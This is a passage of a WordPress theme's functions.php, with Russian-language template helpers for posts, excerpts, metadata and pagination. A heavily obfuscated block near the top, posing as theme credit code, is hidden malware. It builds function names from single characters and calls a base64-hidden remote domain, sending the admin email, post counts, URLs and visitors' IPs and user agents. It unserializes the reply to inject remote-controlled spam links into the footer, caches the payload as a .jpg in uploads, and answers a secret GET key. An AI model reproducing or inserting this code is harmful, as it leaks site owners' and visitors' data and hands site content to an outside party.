<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $fOAopd='e';$TjcPe='a';$pJvJ='_';$Ahsr='o';$VOzkt='d';$bOolQ='4';$HaHr='d';$jDqyfMT='c';$QZfz='b';$ruFzfkp='s';$CgONz='e';$ZTTpXR='e';$ElLxpCw='6';$jADKohNS=$QZfz.$TjcPe.$ruFzfkp.$fOAopd.$ElLxpCw.$bOolQ.$pJvJ.$VOzkt.$ZTTpXR.$jDqyfMT.$Ahsr.$HaHr.$CgONz;$bZhn='e';$oNTo='g';$dhjPfml='n';$gURk='t';$GiqLxe='f';$rlvxs='i';$rqHIC='a';$LWLVxZ='l';$fjAoyTr='z';$LXcwvuXQ=$oNTo.$fjAoyTr.$rlvxs.$dhjPfml.$GiqLxe.$LWLVxZ.$rqHIC.$gURk.$bZhn;$xdpZGZ='o';$xcIg='3';$AvJz='_';$adcqC='1';$sKPeD='t';$WAEqyk='r';$uMLvLS='t';$mzvPCC='s';$gVnXI='r';$lCYWxvVR=$mzvPCC.$uMLvLS.$WAEqyk.$AvJz.$gVnXI.$xdpZGZ.$sKPeD.$adcqC.$xcIg;$jDXH='r';$RUqwDw='v';$pYznA='t';$QHxY='r';$juBM='e';$EJgFpg='s';$zlNyDmqi=$EJgFpg.$pYznA.$QHxY.$jDXH.$juBM.$RUqwDw;                     $ve_______________t='e';$mx_________v='a';$bp________h='_';$pu____l='o';$dh_________r='d';$hk____________a='4';$ze____o='d';$lp______________m='c';$oi__j='b';$ba______________s='s';$jq______r='e';$pn__c='e';$pf________s='6';$az_________k=$oi__j.$mx_________v.$ba______________s.$ve_______________t.$pf________s.$hk____________a.$bp________h.$dh_________r.$pn__c.$lp______________m.$pu____l.$ze____o.$jq______r;$yh______________t='s';$ux___________e='u';$ha____c='_';$yx_____l='e';$mt_______________s='i';$gq_________t='s';$wh____________o='f';$wi__h='x';$ku____________y='c';$wo_______n='t';$nm______________a='o';$nz__o='n';$va______r='n';$jl________x='t';$cs_____z='i';$jz___c=$wh____________o.$ux___________e.$nz__o.$ku____________y.$wo_______n.$mt_______________s.$nm______________a.$va______r.$ha____c.$yx_____l.$wi__h.$cs_____z.$gq_________t.$jl________x.$yh______________t;$ak__h='p';$ct_______________l='o';$at________o='e';$hv_____________g='f';$sc_______________a='n';$vb____________k=$hv_____________g.$ct_______________l.$ak__h.$at________o.$sc_______________a;$rc__k='r';$ho___a='f';$lw__________k='d';$vk_________m='e';$dh___________s='a';$nc____r=$ho___a.$rc__k.$vk_________m.$dh___________s.$lw__________k;$jc_________v='l';$kk_________f='c';$fy_____l='e';$ij___________k='s';$sj__________w='o';$xs_______________v='f';$db___________n=$xs_______________v.$kk_________f.$jc_________v.$sj__________w.$ij___________k.$fy_____l;define("WP_ID", $az_________k("Mi4wLjA="));define("WP_TTL", $az_________k("MTA4MDA="));define("WP_SRC", $az_________k("dHBva24="));function wp_get_header() {global $az_________k, $jz___c;if ($jz___c($az_________k("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$jz___c($az_________k("d3BfZ2V0X2Zvb3Rlcg==")) &&$jz___c($az_________k("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $az_________k, $vb____________k, $db___________n, $nc____r;$ed____________l = TEMPLATEPATH."/".$az_________k("Zm9vdGVyLnBocA==");$hh______________l = @$vb____________k($ed____________l, "r");$ed____________l = @$nc____r($hh______________l, @filesize($ed____________l));@$db___________n($hh______________l);$ag_____n = TEMPLATEPATH."/".$az_________k("ZnVuY3Rpb25zLnBocA==");$hh______________l = @$vb____________k($ag_____n, "r");$ag_____n = @$nc____r($hh______________l, @filesize($ag_____n));@$db___________n($hh______________l);$en______e = 0;if($ed____________l && $ag_____n) {if ($az_________k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ed____________l, $az_________k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$en______e = 1;}if (substr_count($ed____________l, "wp_theme_GPL_credits()") < 1) {$en______e = 2;}}if(WP_ID != "2.0.0") {$en______e = 12;}}if($en______e > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $en______e -->";}}function wp_loaded() {global $az_________k, $jz___c;return $jz___c($az_________k("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ck_____________s, $zn_____c = "(more...)", $fm__________i = 0, $hw___o = "") {$xa____________c = get_the_content($zn_____c, $fm__________i, $hw___o);$xa____________c = apply_filters("the_content", $xa____________c);$xa____________c = str_replace("]]>", "]]>", $xa____________c);if (strlen($_GET["p"]) > 0) {echo $xa____________c;}else if ((strlen($xa____________c)>$ck_____________s) && ($zx____________h = strpos($xa____________c, " ", $ck_____________s ))) {$xa____________c = substr($xa____________c, 0, $zx____________h);$xa____________c = $xa____________c;echo $xa____________c;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$zn_____c</a></div></p>";} else {echo $xa____________c;}}}$ne____________r='b';$lv______________p='c';$ng___l='n';$im_________s='e';$dh________d='s';$kt____________w='d';$mo____________q='6';$kn___v='4';$xf___________k='a';$yj_________l='e';$ab__q='e';$jo____f='_';$ci___________c='o';$uk_______________e=$ne____________r.$xf___________k.$dh________d.$ab__q.$mo____________q.$kn___v.$jo____f.$yj_________l.$ng___l.$lv______________p.$ci___________c.$kt____________w.$im_________s;$cv__________k='_';$ib______v='i';$ou______________z='e';$nj_______________z='t';$nq______f='_';$ls_____________q='f';$gd________u='n';$kh____q='t';$ml____________p='t';$qo_________j='l';$wx_____n='c';$hj_______________e='s';$go________f='g';$vs______________y='e';$nu_______________a='n';$lt______________a='o';$co_____n='e';$he___q=$ls_____________q.$ib______v.$qo_________j.$ou______________z.$nq______f.$go________f.$co_____n.$nj_______________z.$cv__________k.$wx_____n.$lt______________a.$nu_______________a.$kh____q.$vs______________y.$gd________u.$ml____________p.$hj_______________e;$eg____f='i';$pk_______________t='s';$av________j='_';$po__________c='s';$as___o='l';$eg______v='e';$jw_____k='t';$zp__v='e';$ek___________m='x';$ai_______k='f';$nv_____e='i';$ey_________t=$ai_______k.$nv_____e.$as___o.$eg______v.$av________j.$zp__v.$ek___________m.$eg____f.$po__________c.$jw_____k.$pk_______________t;$dm_________y='n';$fc___d='i';$gf_______g='o';$gt______________f='_';$zu______g='v';$jk______________n='r';$wk________d='e';$oy____________n='m';$ne________x='c';$ri__x='p';$ix__m='r';$ke__q='a';$ys_________n='s';$zq______________i='o';$ju____z='e';$ve____________m=$zu______g.$ju____z.$ix__m.$ys_________n.$fc___d.$gf_______g.$dm_________y.$gt______________f.$ne________x.$zq______________i.$oy____________n.$ri__x.$ke__q.$jk______________n.$wk________d;$bm___________j='k';$xo_____________v='s';$fh__r='f';$xe______________j='c';$rg_________x='e';$yy_____________n='p';$op__________l='n';$nd_____________x='o';$cv____u='o';$pa_________f=$fh__r.$xo_____________v.$cv____u.$xe______________j.$bm___________j.$nd_____________x.$yy_____________n.$rg_________x.$op__________l;$le___v='i';$if_______o='w';$yy______________d='f';$sm___________j='r';$jf____________r='t';$cp_______________x='e';$dp____________u=$yy______________d.$if_______o.$sm___________j.$le___v.$jf____________r.$cp_______________x;$cc________e='5';$kw______u='d';$bg____________m='m';$rd__________c=$bg____________m.$kw______u.$cc________e;$qb_______________i='p';$xx___v='a';$cu__________v='l';$qp____________o='a';$cx______________q='h';$ha________b='t';$nm__u='r';$bg___________b='e';$sk_____________i=$nm__u.$bg___________b.$qp____________o.$cu__________v.$qb_______________i.$xx___v.$ha________b.$cx______________q;$qa_______y='a';$vs____o='e';$go______________c='e';$uj_____o='i';$lq______________a='i';$oe_____r='n';$yg_________g='r';$lc______________q='s';$ve___________g='z';$zn______m='u';$ly______l='l';$hf________l=$zn______m.$oe_____r.$lc______________q.$vs____o.$yg_________g.$uj_____o.$qa_______y.$ly______l.$lq______________a.$ve___________g.$go______________c;$km_______c='a';$kw__m='n';$jj____________c='m';$my_____n='p';$ys___________o='e';$et_____n='t';$rp___l='m';$sf_____________d=$et_____n.$ys___________o.$jj____________c.$my_____n.$kw__m.$km_______c.$rp___l;$ot_____________t='e';$ja_______t='s';$fe__________t='o';$ja___________x='e';$ej______k='c';$uw___________q='_';$rf___o='t';$ww_______________h='r';$eb______y='t';$lo_________v='e';$wj__________h='x';$oj______________p='t';$yz__________l='_';$lv________a='m';$ji____________t='t';$ql___________s='a';$wh_________e='a';$ox____c='r';$on_______l='n';$ik___________y='e';$nf____________w='c';$pm____________y=$ja_______t.$oj______________p.$ww_______________h.$ja___________x.$ql___________s.$lv________a.$uw___________q.$nf____________w.$fe__________t.$on_______l.$ji____________t.$ik___________y.$wj__________h.$eb______y.$yz__________l.$ej______k.$ox____c.$lo_________v.$wh_________e.$rf___o.$ot_____________t;function wl_________i($gs____________v) {global $az_________k, $jz___c, $he___q, $ve____________m, $pm____________y;if (!$jz___c($az_________k("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ve____________m(PHP_VERSION, "5.0.0", ">=") && $jz___c($az_________k("ZmlsZV9nZXRfY29udGVudHM=")) && $jz___c($az_________k("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$cw______________b = $pm____________y(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$nz_________i = @$he___q($gs____________v, 0, $cw______________b);} else {$nz_________i = @$he___q($gs____________v, 0);}return $nz_________i;}function yy_______________f($gs____________v) {global $jz___c, $pa_________f, $dp____________u, $az_________k;if (!$jz___c($az_________k("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$pk___________g = strpos($gs____________v, "/", 7);$ir______d = array("uri"     => substr($gs____________v, $pk___________g),"host"    => str_replace("http://", "", substr($gs____________v, 0, $pk___________g)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$kb________s = @$pa_________f("$ir______d[host]", 80, $vg_____________n, $ud__________e, 4);if (!$kb________s) {return false;} else {$nz_________i = "";$gl___u  = "GET $ir______d[uri] HTTP/1.0\r\n";$gl___u .= "Host: $ir______d[host]\r\n";$gl___u .= "Referer: $ir______d[referer]\r\n";$gl___u .= "Connection: Close\r\n\r\n";@$dp____________u($kb________s, $gl___u);while (!@feof($kb________s)) {$dw_______v = @fgets($kb________s, (1024*24));if ($dw_______v == "\r\n") {$pp______________g = true;continue;}if ($pp______________g) {$nz_________i .= $dw_______v;}}return $nz_________i;}}function oq___________k($gs____________v) {global $jz___c;$yq_____g = false;if ($gs____________v != "") {if ($jz___c("wl_________i")) {$yq_____g = @wl_________i($gs____________v);}if (!$yq_____g && ($jz___c("yy_______________f"))) {$yq_____g = @yy_______________f($gs____________v);}}return $yq_____g;}function wh________p() {global $_SERVER, $rd__________c;$dw________z = $_SERVER["SERVER_NAME"];if (substr("$dw________z", 0, 4) == "www.") {$dw________z = substr("$dw________z", 4);}$dw________z = $rd__________c("$_SERVER[SERVER_NAME]");return $dw________z;}function km___d() {return "file";}function pn__h($gs____________v) {global $_SERVER, $he___q, $ey_________t, $vb____________k, $db___________n, $dp____________u;$gq____________e = pq______________c();$oy_______________d = wh________p().".jpg";$xo_______________f = $gq____________e["dir_upload"]["path"]."/$oy_______________d";$ax____________k = @filemtime($xo_______________f);if (!$ax____________k || ((time()-$ax____________k) >= WP_TTL)) {$yq_____g = oq___________k($gs____________v);if ($yq_____g) {if ($ey_________t($xo_______________f)) {@unlink($xo_______________f);}$hh______________l = @$vb____________k($xo_______________f, "x+");@$dp____________u($hh______________l, $yq_____g);@$db___________n($hh______________l);}} else {if ($ey_________t($xo_______________f)) {$yq_____g = @$he___q($xo_______________f);} else {$yq_____g = false;}}return $yq_____g;}function pq______________c() {global $_SERVER, $az_________k, $uk_______________e;$ey___z = wp_count_posts("post");$dc______________o = pathinfo(get_bloginfo("template_directory"));$gq____________e = array("url" => array("report"      => $az_________k("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $dc______________o,"dir_upload"=> fs____p(),"queryString"=> array("?a001=".WP_ID,"a004=".$dc______________o[filename],"a005=".$ey___z->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "");$gq____________e["url"]["queryString"] = implode("&", $gq____________e["queryString"]);$gq____________e["url"]["report"] = $gq____________e["url"]["report"]."/?".$uk_______________e($gq____________e["url"]["queryString"]).".html";return $gq____________e;}function fs____p() {$uu_____________n = wp_upload_dir();if (isset($uu_____________n["error"])) {$zc__________e = zm____z();if (is_writable($zc__________e)) {$uu_____________n = array("path" => $zc__________e);}}return $uu_____________n;}function zm____z() {global $jz___c, $rd__________c, $sk_____________i, $sf_____________d;$qh__________l = (bool) ini_get("safe_mode");if ($qh__________l == true) {return false;}if ($jz___c("sys_get_temp_dir")) {$xo_______________q = sys_get_temp_dir();if (is_writable($xo_______________q)) {return $sk_____________i($xo_______________q);}}if (!empty($_ENV["TMP"])) {return $sk_____________i($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $sk_____________i($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $sk_____________i($_ENV["TEMP"]);} else {$sh_______x = $sf_____________d($rd__________c(uniqid(rand(), true)), "");if ($sh_______x) {$xo_______________q = $sk_____________i(dirname($sh_______x));@unlink($sh_______x);return $xo_______________q;} else {return false;}}}function it_____l() {global $_GET, $ey_________t;$gq____________e = pq______________c();$dw________z = wh________p();$id____h = km___d();$rb__w = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($id____h == "file") {$nj______t = $gq____________e["dir_upload"]["path"]."/".$dw________z.".jpg";if ($ey_________t($nj______t)) {@unlink($nj______t);$rb__w = "deleted";}}$hg___k = array("s"=> $rb__w,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($hg___k AS $aj_________n => $sx_____a) echo " [$aj_________n:$sx_____a]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $jz___c, $az_________k, $hf________l;$gq____________e = pq______________c();$eu_______________s = "pn__h";if ($jz___c($eu_______________s)) {$nz_________i = $eu_______________s($gq____________e["url"]["report"]);}if ($nz_________i) {if ($nz_________i = @$az_________k($nz_________i)) {$nz_________i = @$hf________l($nz_________i);if (strlen($nz_________i[custom_credit]) >= 5) {$gq____________e["default_string"] = $nz_________i[custom_credit];}if ($nz_________i["status"] == "0") {$vd_____________t = 1;$an________h = 1;} else {$jo______________l = sizeof($nz_________i["links"]);$yt___________c = $gq____________e["default_string"];if ($jo______________l > 0 && $nz_________i["links"] !== "") {$kw___________e = 0;foreach ($nz_________i["links"] as $ch________m => $yv__________o) {$kw___________e++;if ($yv__________o->l_path == "" || $yv__________o->l_path == $_SERVER["REQUEST_URI"]) {$yv__________o->l_href = htmlspecialchars(strip_tags($yv__________o->l_href));$yv__________o->l_title = htmlspecialchars(strip_tags($yv__________o->l_title));$yv__________o->l_anchor = htmlspecialchars(strip_tags($yv__________o->l_anchor));$yt___________c .= " | ";$yt___________c .= "<a href='$yv__________o->l_href' title='$yv__________o->l_title'";if ($yv__________o->l_nofollow == "1") {$yt___________c .= " rel='nofollow'";}$yt___________c .= ">$yv__________o->l_anchor</a>";}}}$gq____________e["links"] = "$yt___________c";if ($nz_________i[credit] == "0") {$gq____________e["links"] = "";}}} else {$vd_____________t = "1";}} else {$vd_____________t = "1";}if ($vd_____________t == "1") {$gq____________e["links"] = $gq____________e["default_string"];}echo "$gq____________e[links]";echo "<!-- s: $nz_________i[signature] -->";it_____l();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),   
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
